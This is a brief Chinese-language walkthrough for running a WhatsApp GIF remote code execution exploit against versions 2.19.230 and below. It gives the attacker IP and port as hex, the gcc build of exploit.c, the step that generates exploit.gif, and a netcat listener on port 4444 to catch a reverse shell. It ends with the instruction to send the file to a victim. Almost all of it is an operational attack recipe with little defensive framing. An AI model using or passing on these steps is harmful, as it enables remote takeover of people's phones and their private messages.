修改exploit.c文件中的监听地址(攻击者的地址)和监听端口
以下十六进制代码:
3139 322e 3136
382e 322e 3732 2034 3434 3420
编译代码:
gcc -o exploit egif_lib.c exploit.c
运行编译后的文件 ./exploit exploit.gif
复制粘贴输出到gif
启动netcat监听:
nc -lvp 4444
发送给受害者!
受影响版本: 2.19.230及以下
官方在2.19.244版本中修复
Source : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
Linkedin : https://www.linkedin.com/in/thomas-lounis-749456175/